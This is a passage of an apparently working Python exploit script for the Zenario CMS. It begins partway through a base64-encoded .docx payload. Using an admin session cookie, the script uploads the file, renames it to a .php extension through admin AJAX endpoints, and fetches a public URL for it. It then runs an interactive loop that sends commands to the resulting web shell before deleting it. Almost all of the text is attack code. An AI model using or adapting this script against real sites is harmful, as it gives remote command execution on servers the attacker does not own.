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\nCwDBAgAAvSsAAAAA\n" file_name = uuid.uuid4().hex file = open(file_name + ".docx", "wb") file.write(base64.decodebytes(file_content)) file.close() ### Upload docx file resp = requests.post(TARGET + "/zenario/ajax.php?method_call=handleAdminBoxAJAX&path=zenario_document_upload", headers={"Cookie":PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"}, data={"id":"", "fileUpload": 1, }, files={"Filedata": open(file_name + ".docx", "rb")}) ### Get sync id file resp_body = json.loads(resp.text) id_sync = resp_body["id"] # Update database resp = requests.post(TARGET + "/zenario/admin/admin_boxes.ajax.php?path=zenario_document_upload", headers={"X-Requested-With": "XMLHttpRequest", "Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"}, data={"_save": "true", "_confirm": "", "_box": '{"tabs":{"upload_document":{"edit_mode":{"on":1},"fields":{"document__upload":{"current_value":"' + id_sync + '"},"privacy":{"_display_value":false,"current_value":"public"}}}},"_sync":{"cache_dir":"' + cache_dir_sync + '","password":"' + password_sync + '","iv":"' + iv_sync + '","session":false},"tab":"upload_document"}'}) # If upload OK print("Upload file OK!") ## Change file extension ### Search ID file in Database resp = requests.get(TARGET + "/zenario/admin/organizer.ajax.php?path=zenario__content/panels/documents&_sort_col=ordinal&_search=" + file_name, headers={"Cookie": PHPSESSID}) resp_body = json.loads(resp.text) file_id = resp_body["__item_sort_order__"]["0"] ### Get sync info resp = requests.post(TARGET + "/zenario/admin/admin_boxes.ajax.php?path=zenario_document_properties&id=" + str(file_id), headers={"Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"}, data={"_fill": "true", "_values": ""}) resp_body = json.loads(resp.text) password_sync = resp_body["_sync"]["password"] iv_sync = resp_body["_sync"]["iv"] cache_dir_sync = resp_body["_sync"]["cache_dir"] ### Change to .php resp = requests.post(TARGET + "/zenario/admin/admin_boxes.ajax.php?path=zenario_document_properties&id=" + str(file_id), headers={"Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"}, data={"_save": "true", "_confirm": "", "_box": '{"tabs":{"details":{"edit_mode":{"on":1},"fields":{"document_extension":{"_was_hidden_before":true,"current_value":"php"},"document_title":{"current_value":""},"document_name":{"current_value":"' + file_name + '"},"checksum":{"_was_hidden_before":true,"current_value":"y8vuS"},"date_uploaded":{"current_value":"2021-09-2920173A213A31"},"privacy":{"_display_value":"Public","current_value":"public"},"tags":{"_display_value":false,"current_value":""},"link_to_add_tags":{}}},"upload_image":{"edit_mode":{"on":true},"fields":{"thumbnail_grouping":{},"title":{"current_value":""},"thumbnail_image":{},"delete_thumbnail_image":{},"zenario_common_feature__upload":{"current_value":""}}},"extract":{"edit_mode":{"on":0},"fields":{"extract":{"current_value":"No20plain-text20extract"},"extract_wordcount":{"current_value":0}}}},"_sync":{"cache_dir":"' + cache_dir_sync + '","password":"' + password_sync + '","iv":"' + iv_sync + '","session":false},"tab":"details"}'}) ## Get public URL webshell resp = requests.post(TARGET + "/zenario/ajax.php?__pluginClassName__=zenario_common_features&__path__=zenario__content/panels/documents&method_call=handleOrganizerPanelAJAX", headers={"Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"}, data={"id": file_id, "generate_public_link": 1}) response_body = resp.text web_shell_url = response_body[response_body.find("http"): response_body.find(file_name) + 36] # If web shell OK print("Web shell is available!") print("URL:", web_shell_url) print("Enter command.") ## Execute command cmd = '' while cmd != "exit": ### Get command cmd = input("> ") ### Get result resp = requests.post(web_shell_url, data={"cmd": cmd}) response_body = resp.text result = response_body[response_body.find("8d589afa4dfaeeed85fff5aa78e5ff6a") + 32: response_body.find("7f021a1415b86f2d013b2618fb31ae53")] print(result) pass ## Delete web shell resp = requests.post(TARGET + "/zenario/ajax.php?__pluginClassName__=zenario_common_features&__path__=zenario__content/panels/documents&method_call=handleOrganizerPanelAJAX", headers={"Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"}, data={"id": file_id, "delete": 1}) print("Web shell is deleted!") # Delete docx file os.remove(file_name + ".docx") print("Docx file is deleted!")